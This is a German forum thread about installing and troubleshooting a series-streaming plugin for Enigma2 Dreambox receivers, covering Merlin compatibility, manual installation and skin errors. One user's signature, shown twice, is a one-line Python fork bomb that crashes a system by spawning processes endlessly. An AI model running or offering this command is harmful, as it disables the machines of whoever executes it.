bs Streamer v0.4 *OE 2.0 only*

• Wenn ich zu Mercedes gehe und will nen auto und frage kann ich den motor auch bei nem Ferarri nutzen was glaubst du was du für ne antwort bekommst?
    Ich verstehe das nicht ihr kommt zu nn2 und bettelt nach nem plugin für merlin normal sollte man diesen thread schließen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Wenns doof ist benutzt es nicht das ist keine Demokratie das entscheidet dirtylion was wie gestaltet wird.
    Es funktioniert tadelos hier bei jedem start checkt er obs neue serien gibt und das ist alles andere als doof das ist was feines.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Selbstverständlich ist das mit den favouriten wesentlich besser.
    Ich will doch nicht jedesmal durch 100 serien scrollen bis ich zu der komme die ich eigentlich nutzen will.
    So hab ich gleich beim start alles was ich brauche auf der ersten seite.
    Danke für die funktion! :)
    “If you think this has a happy ending, you haven't been paying attention.”
  • Aus welchem Grund sollte ich hier nicht fragen dürfen, ob das Plugin auch unter Merlin3 läuft? Es heißt ja im Titel auch "OE 2.0 only" und nicht "NN2-only". Außerdem werden doch neuerdings andere Plugins (z.B. Chartsplayer) ausschließlich in diesem Board supportet. Und darum war ich auch so frei mal in diesem Thread zu fragen.
    Ich war wenigstens zu nett und habe mich um Interpunktion und Groß- und Kleinschreibung gekümmert. Außerdem habe ich mich nicht versteckt und offen aufs Merlin-Image verwiesen. Da finde ich es nicht sehr fair, wie mir die Tür hier vor dem Kopf zugeknallt werden soll. :)
  • Ich hatte das IPK ja bereits installiert. Im Übrigen hatte ich folgendes File für meine DM7020HD genommen:
    feed.newnigma2.to/unstable/4.0…n20120723-r0_dm7020hd.ipk

Doch beim Aufruf der Erweiterungen erscheint der u.a. Fehler (siehe Screenshot).

---

Nachtrag 1

Wahrscheinlich, weil es nach \usr\lib\enigma2\python\Plugins\newnigma2\burnseries entpackt wird, oder? Manuell per FTP verschieben, hat leider auch nicht geholfen.

Nachtrag 2

In den Dateien "plugin.pyo" und "__init__.pyo" sind die Pfade fest codiert. Kann man da 'was machen?
    Bilder
    • screenshot.jpg

43,52 kB, 720×405, 2.691 mal angesehen

Dieser Beitrag wurde bereits 5 mal editiert, zuletzt von julius.hibbert ()

• Schade, im Chartsplayer-Plugin sind die Pfade ebenfalls identisch hard-codiert und das läuft ja im Merlin-Image.

Nachtrag
    GEIL. Es funktioniert.

- Manuell entpackt
    - nach /usr/lib/enigma2/python/Plugins/Extensions/burnseries hochgeladen
    - Rechte auf chmod 755 gesetzt
    - Enigma2-Neustart
    - Plugin wird angezeigt und ein Teststream lief perfekt

Danke Danke Danke für so ein geiles Plugin.

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von julius.hibbert ()

• Die Installation hat wunderbar geklappt und ich kann die Streams problemlos anschauen.
    Aber warum kann ich während der Wiedergabe die DM8000 nicht bedienen? Pause, Stop, Vor- und Zurückspule, Menu und Exit funktionieren nicht. Mir bleibt nur der Ein/Aus-Schalter auf der Rückseite.

Alle anderen Plugins wie z.B. der Mediaplayer oder EMC funktionieren ohne Probleme.

Ich habe das OE2.0 vom unstable feed auch schon neu installiert, aber die Box lässt sich während des streamens trotzdem nicht bedienen.

Was passt nicht?
    Bitte schreibt mir jetzt nicht, dass die Fernbedienung erst in der Version 0.4 implementiert wird, denn dann stürze ich mich aus´m Kellerfenster. :doh:
  • pause, stop usw funktioniert doch...

exit geht auch..

geht alles wie es sein soll
    Probleme kann man niemals mit derselben Denkweise lösen.

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • @orca74

mach mir mal ein log.
    telnet zur deiner dreambox
    gib folgendes ein:

init 5
    enigma2 >enigma2_logfile.log 2>&1

und dann öffne burning series.. und starte einen stream und drück stop etc..

evtl. hast du neutrino key eingestellt..
    Du brauchst hilfe ?? !!
    JOIN unseren irc channel #newnigma2 @ irc0.brn.ch.swissirc.net

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dirtylion ()

• [BS]: [Failure instance: Traceback: <type 'exceptions.AttributeError'>: 'eSlider' object has no attribute 'setForegroundColor'

welches skin nutzt du nimm mal den standart skin..

sonst sehe ich keinen fehler es liegt am burning plugin..
    Du brauchst hilfe ?? !!
  • Mein Stadard-Skin ist der dmconcinnity-hd. Ich hab diverse Skins durchprobiert. Leider ohne Erfolg, alles beim Alten.

Dank deinem Tipp, es könnte am Skin liegen, habe ich meine skin_user.xml Datei, die für das interne Grautec-TFT der DM8000 benötigt wird, ausgeklammert.
    Jetzt funktioniert dein Plugin wunderbar. Da muss man mal drauf kommen. :denk:

Bitte werf noch mal nen Blick in meine skin_user.xml. Fällt dir da was auf bzw. findest du einen Fehler?

Danke und Gruß

Orca74
    Dateien

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von orca74 ()

• du musst in der neusten version erst deine Favoriten adden !
    Probleme kann man niemals mit derselben Denkweise lösen.

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • Original von kursun11
    funktioniert das Plugin nur auf dem newnigma image, wenn ich es auf das orginal installiere kommt zwar die oberfläche von dem Plugin aber ohne inhalt!

INFO:
    - Serien zu favoriten hinzufügen -> A-Z "GRÜN" -> Serie auswählen "OK"
    Du brauchst hilfe ?? !!

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dirtylion ()